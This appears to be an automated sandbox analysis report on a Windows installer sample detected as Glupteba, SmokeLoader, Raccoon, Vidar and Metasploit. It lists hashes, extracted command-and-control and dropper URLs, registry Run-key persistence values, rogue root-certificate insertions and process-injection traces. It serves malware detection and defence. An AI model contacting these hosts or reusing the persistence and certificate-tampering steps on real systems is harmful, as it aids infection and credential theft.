glupteba | 344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e

Target

Setup3310.exe
Size

381KB
MD5

acf61459d6319724ab22cb5a8308d429
SHA1

8a5d782e6f31c3005e5e0706a3d266ece492a6cf
SHA256

344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e
SHA512

d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877

Score

10^/10

glupteba metasploit raccoon smokeloader vidar afefd33a49c7cbd55d417545269920f24c85aa37 backdoor discovery dropper evasion loader persistence spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6584-404-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral1/memory/6584-406-0x00000000050B0000-0x000000000590D000-memory.dmp	family_glupteba
behavioral1/memory/6584-408-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Modifies boot configuration data using bcdedit 15 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
14724	bcdedit.exe
14592	bcdedit.exe
14912	bcdedit.exe
15020	bcdedit.exe
8596	bcdedit.exe
15076	bcdedit.exe
15216	bcdedit.exe
736	bcdedit.exe
15348	bcdedit.exe
15392	bcdedit.exe
15504	bcdedit.exe
15608	bcdedit.exe
15684	bcdedit.exe
15740	bcdedit.exe
15852	bcdedit.exe

Drops file in Drivers directory 1 IoCs

Processes:

HGT.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts HGT.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	HGT.exe

Executes dropped EXE 33 IoCs

Processes:

Setup3310.tmpSetup.exeSetup.tmpDelta.exeDelta.tmpSetup.exePictureLAb.exePictureLAb.tmpSetup.exeSetup.tmpHGT.exeprolab.exeZHipigapybu.exeprolab.tmpgaooo.exejfiag3g_gg.exejfiag3g_gg.exehjjgaa.exejfiag3g_gg.exejfiag3g_gg.exemd7_7dfj.exeaskinstall29.execustomer4.exemain.exeHookSetp.exeprivacytools5.exe4784775.526727327.73privacytools5.exeWindows Host.exesetup.exeMultitimerFour.exemultitimer.exe

pid	process
848	Setup3310.tmp
2588	Setup.exe
3932	Setup.tmp
2712	Delta.exe
208	Delta.tmp
3132	Setup.exe
1604	PictureLAb.exe
2376	PictureLAb.tmp
2696	Setup.exe
1568	Setup.tmp
2056	HGT.exe
2448	prolab.exe
1780	ZHipigapybu.exe
732	prolab.tmp
15624	gaooo.exe
16316	jfiag3g_gg.exe
7320	jfiag3g_gg.exe
10556	hjjgaa.exe
10696	jfiag3g_gg.exe
15064	jfiag3g_gg.exe
5196	md7_7dfj.exe
8568	askinstall29.exe
14948	customer4.exe
15180	main.exe
1052	HookSetp.exe
15960	privacytools5.exe
16120	4784775.52
16180	6727327.73
16340	privacytools5.exe
16420	Windows Host.exe
16888	setup.exe
17068	MultitimerFour.exe
17304	multitimer.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral1/memory/10020-531-0x0000000000400000-0x0000000000897000-memory.dmp	upx

Loads dropped DLL 13 IoCs

Processes:

Setup3310.tmpSetup.tmpDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemain.exeprivacytools5.exe

pid	process
848	Setup3310.tmp
848	Setup3310.tmp
3932	Setup.tmp
3932	Setup.tmp
208	Delta.tmp
208	Delta.tmp
2376	PictureLAb.tmp
2376	PictureLAb.tmp
1568	Setup.tmp
3132	Setup.exe
3132	Setup.exe
15180	main.exe
16340	privacytools5.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

HGT.exegaooo.exehjjgaa.exe6727327.73

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Lejirokaedo.exe\""	HGT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gaooo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	6727327.73

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md7_7dfj.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
64	ipinfo.io
276	api.ipify.org
294	ipinfo.io
225	ipinfo.io
11	ipinfo.io
56	ipinfo.io
223	ipinfo.io
613	ipinfo.io
616	ipinfo.io
8	ipinfo.io
98	ip-api.com
184	checkip.amazonaws.com
329	ipinfo.io
414	ip-api.com
568	checkip.amazonaws.com

Suspicious use of SetThreadContext 1 IoCs

Processes:

privacytools5.exe

description pid process target process

PID 15960 set thread context of 16340 15960 privacytools5.exe privacytools5.exe

description	pid	process	target process
PID 15960 set thread context of 16340	15960	privacytools5.exe	privacytools5.exe

Drops file in Program Files directory 23 IoCs

Processes:

HGT.exeprolab.tmp

description	ioc	process
File created	C:\Program Files\Java\OGMENEMCZI\prolab.exe	HGT.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-69U9G.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-67QJG.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Math.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\DockingToolbar.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-88ADN.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-CRJ6D.tmp	prolab.tmp
File created	C:\Program Files\Java\OGMENEMCZI\prolab.exe.config	HGT.exe
File created	C:\Program Files (x86)\Windows Defender\Lejirokaedo.exe	HGT.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-I6B33.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-PVEKE.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-UB378.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceLibrary.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-HG3HN.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-D7AC3.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-I6738.tmp	prolab.tmp

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6740	4592	WerFault.exe	db14y2wcsj4.exe
6816	4592	WerFault.exe	db14y2wcsj4.exe
6900	4592	WerFault.exe	db14y2wcsj4.exe
7108	4592	WerFault.exe	db14y2wcsj4.exe
7216	4592	WerFault.exe	db14y2wcsj4.exe
7972	4592	WerFault.exe	db14y2wcsj4.exe
8076	4592	WerFault.exe	db14y2wcsj4.exe
15056	15128	WerFault.exe	4D20.tmp.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

privacytools5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	privacytools5.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Setup.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2804	schtasks.exe
6420	schtasks.exe
11044	schtasks.exe
12652	schtasks.exe
13680	schtasks.exe
16144	schtasks.exe
14060	schtasks.exe
15548	schtasks.exe
2336	schtasks.exe
12368	schtasks.exe
12716	schtasks.exe
10380	schtasks.exe
13860	schtasks.exe
5736	schtasks.exe
17252	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

11672 timeout.exe
2816 timeout.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5472 taskkill.exe
11604 taskkill.exe
10848 taskkill.exe
5896 taskkill.exe
4048 taskkill.exe
10588 taskkill.exe

pid	process
11672	timeout.exe
2816	timeout.exe

pid	process
5472	taskkill.exe
11604	taskkill.exe
10848	taskkill.exe
5896	taskkill.exe
4048	taskkill.exe
10588	taskkill.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

ZHipigapybu.exeaskinstall29.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	ZHipigapybu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall29.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall29.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	ZHipigapybu.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

9124 PING.EXE

pid	process
9124	PING.EXE

Script User-Agent 21 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	293	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	622	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	71	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	224	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	48	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	55	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	64	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	67	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	615	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	46	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	328	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.tmpSetup.exeprolab.tmpZHipigapybu.exe

pid	process
3932	Setup.tmp
3932	Setup.tmp
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
3132	Setup.exe
732	prolab.tmp
732	prolab.tmp
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe
1780	ZHipigapybu.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

HGT.exeZHipigapybu.exetaskkill.exemd7_7dfj.exetaskkill.exeHookSetp.exe4784775.52MultitimerFour.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2056	HGT.exe
Token: SeDebugPrivilege	1780	ZHipigapybu.exe
Token: SeDebugPrivilege	4048	taskkill.exe
Token: SeManageVolumePrivilege	5196	md7_7dfj.exe
Token: SeDebugPrivilege	10588	taskkill.exe
Token: SeManageVolumePrivilege	5196	md7_7dfj.exe
Token: SeManageVolumePrivilege	5196	md7_7dfj.exe
Token: SeDebugPrivilege	1052	HookSetp.exe
Token: SeDebugPrivilege	16120	4784775.52
Token: SeDebugPrivilege	17068	MultitimerFour.exe
Token: SeDebugPrivilege	16952	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

Setup3310.tmpSetup.tmpDelta.tmpPictureLAb.tmpprolab.tmp

pid process

848 Setup3310.tmp
3932 Setup.tmp
208 Delta.tmp
2376 PictureLAb.tmp
732 prolab.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup3310.exeSetup3310.tmpSetup.exeSetup.tmpDelta.exeDelta.tmpPictureLAb.exePictureLAb.tmpSetup.exeSetup.tmpHGT.exeprolab.exeSetup.execmd.exeZHipigapybu.execmd.exegaooo.exehjjgaa.exe

description	pid	process	target process
PID 3920 wrote to memory of 848	3920	Setup3310.exe	Setup3310.tmp
PID 3920 wrote to memory of 848	3920	Setup3310.exe	Setup3310.tmp
PID 3920 wrote to memory of 848	3920	Setup3310.exe	Setup3310.tmp
PID 848 wrote to memory of 2588	848	Setup3310.tmp	Setup.exe
PID 848 wrote to memory of 2588	848	Setup3310.tmp	Setup.exe
PID 848 wrote to memory of 2588	848	Setup3310.tmp	Setup.exe
PID 2588 wrote to memory of 3932	2588	Setup.exe	Setup.tmp
PID 2588 wrote to memory of 3932	2588	Setup.exe	Setup.tmp
PID 2588 wrote to memory of 3932	2588	Setup.exe	Setup.tmp
PID 3932 wrote to memory of 2712	3932	Setup.tmp	Delta.exe
PID 3932 wrote to memory of 2712	3932	Setup.tmp	Delta.exe
PID 3932 wrote to memory of 2712	3932	Setup.tmp	Delta.exe
PID 2712 wrote to memory of 208	2712	Delta.exe	Delta.tmp
PID 2712 wrote to memory of 208	2712	Delta.exe	Delta.tmp
PID 2712 wrote to memory of 208	2712	Delta.exe	Delta.tmp
PID 208 wrote to memory of 3132	208	Delta.tmp	Setup.exe
PID 208 wrote to memory of 3132	208	Delta.tmp	Setup.exe
PID 208 wrote to memory of 3132	208	Delta.tmp	Setup.exe
PID 3932 wrote to memory of 1604	3932	Setup.tmp	PictureLAb.exe
PID 3932 wrote to memory of 1604	3932	Setup.tmp	PictureLAb.exe
PID 3932 wrote to memory of 1604	3932	Setup.tmp	PictureLAb.exe
PID 1604 wrote to memory of 2376	1604	PictureLAb.exe	PictureLAb.tmp
PID 1604 wrote to memory of 2376	1604	PictureLAb.exe	PictureLAb.tmp
PID 1604 wrote to memory of 2376	1604	PictureLAb.exe	PictureLAb.tmp
PID 2376 wrote to memory of 2696	2376	PictureLAb.tmp	Setup.exe
PID 2376 wrote to memory of 2696	2376	PictureLAb.tmp	Setup.exe
PID 2376 wrote to memory of 2696	2376	PictureLAb.tmp	Setup.exe
PID 2696 wrote to memory of 1568	2696	Setup.exe	Setup.tmp
PID 2696 wrote to memory of 1568	2696	Setup.exe	Setup.tmp
PID 2696 wrote to memory of 1568	2696	Setup.exe	Setup.tmp
PID 1568 wrote to memory of 2056	1568	Setup.tmp	HGT.exe
PID 1568 wrote to memory of 2056	1568	Setup.tmp	HGT.exe
PID 2056 wrote to memory of 2448	2056	HGT.exe	prolab.exe
PID 2056 wrote to memory of 2448	2056	HGT.exe	prolab.exe
PID 2056 wrote to memory of 2448	2056	HGT.exe	prolab.exe
PID 2056 wrote to memory of 1780	2056	HGT.exe	ZHipigapybu.exe
PID 2056 wrote to memory of 1780	2056	HGT.exe	ZHipigapybu.exe
PID 2448 wrote to memory of 732	2448	prolab.exe	prolab.tmp
PID 2448 wrote to memory of 732	2448	prolab.exe	prolab.tmp
